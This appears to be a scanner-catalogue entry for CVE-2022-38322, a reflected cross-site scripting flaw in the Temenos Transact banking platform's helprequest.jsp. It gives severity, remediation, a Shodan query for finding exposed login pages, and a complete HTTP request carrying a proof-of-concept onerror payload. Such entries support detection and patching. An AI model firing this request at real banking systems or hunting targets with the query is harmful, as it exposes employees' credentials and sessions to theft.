| Title | Temenos Transact - Cross-Site Scripting |
|---|---|
| Author | qotoz |
| Severity | High |
| Impact | Attackers can inject malicious JavaScript through the helprequest.jsp component, potentially stealing banking credentials and session tokens from employees using the Temenos core banking platform. |
| Remediation | Update Temenos Transact to a patched version that properly sanitizes the url parameter in helprequest.jsp and encodes output to prevent XSS attacks. |
| Shodan Query | http.title:"transact sign in","t24 sign in" |
| Tags | cve cve2022 temenos transact xss vuln |
Multiple vulnerabilities in Temenos Transact (formerly T24) that allows multiple reflected cross-site scripting (XSS) attacks.
GET /jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-38322.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-38322.pcap
N/AN/A